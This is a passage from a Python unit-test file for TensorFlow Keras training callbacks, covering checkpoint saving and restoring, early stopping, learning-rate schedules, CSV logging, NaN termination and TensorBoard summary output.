expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'.*1/2\n'
r'.*80/80.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*\n'
r'.*2/2\n'
r'.*80/80.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 6: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 7: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=30,
period=100) # The period should be ignored (this test tests this).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 8: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegexp(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1]] * 16
train_label = [[0]] * 16
ds = dataset_ops.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
class Bias(base_layer.Layer):
def build(self, input_shape):
self.bias = self.add_variable('bias', (1,), initializer='zeros')
def call(self, inputs):
return inputs + self.bias
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period ensuring the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are closed, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, dirnames, filenames) in os.walk(logdir):
del dirnames # unused
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in summary_iterator.summary_iterator(path):
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
elif kind == 'tensor' and tag != 'keras':
# Check for V2 scalar summaries, which have a different PB
# structure.
if event.summary.value[
0].metadata.plugin_data.plugin_name == 'scalars':
container = result.scalars
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
